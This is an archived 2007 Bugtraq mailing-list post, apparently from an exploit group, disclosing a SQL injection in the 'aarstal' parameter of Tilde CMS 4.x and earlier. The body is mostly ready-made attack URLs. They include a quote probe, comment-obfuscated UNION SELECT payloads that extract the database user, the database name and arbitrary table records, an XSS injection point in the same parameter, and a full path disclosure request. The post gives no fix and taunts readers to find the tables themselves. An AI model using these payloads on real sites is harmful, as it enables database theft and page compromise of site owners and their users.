Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---

• From: kingoftheworld92@xxxxxxxxxxxxx
• Date: 26 Nov 2007 19:06:24 -0000

---

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the database...as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some recordes by the database like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------

---

• Prev by Date: DeluxeBB E-Mail Address Change Security Bypass
• Next by Date: SimpleGallery v0.1.3 (index.php) Cross-Site Scripting Vulnerability
• Previous by thread: DeluxeBB E-Mail Address Change Security Bypass
• Next by thread: SimpleGallery v0.1.3 (index.php) Cross-Site Scripting Vulnerability
• Index(es):
  • Date
  • Thread

---

Relevant Pages [waraxe-2005-SA#039] - Critical Sql Injection in Sgallery module for PhpNuke ... Module's Name: SGallery ... A - Full Path Disclosure ... Looking at source code, presented above, we can see unsecure sql queries directed to the database. ... But anyway, sql injection exists, can be exploited and must be ... (Bugtraq) Re: Jet engine stopped ... Compact the database to get rid of this junk: ... Try the queries again, while no other tables, queries, forms, or reports ... Thank you in advance for your help and explanation. ... (microsoft.public.access.queries) Re: Permutations - 8 columns ... I took the OP's explanation to mean that owing to the "financial" ... complete "copies" of the data by extracting it whole... ... > Sounds like he is blindly querying the database with all possible ... >> Tim. ... (microsoft.public.excel.programming) RE: Access 2007 External Data Import will not recognize yyyymmdd date ... you Klatuu for a succinct solution and Benjy for more explanation. ... "catkin63" wrote: ... and check either This database or All databases. ... address the wizard, which has no option for CDate or DateSerial. ... (microsoft.public.access.externaldata) Re: tables that are linked are not getting updated ... I thought there'd be an issue with my explanation. ... I'd copied the back-end of the database seperately from the front-end. ... (microsoft.public.access.externaldata)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2007-11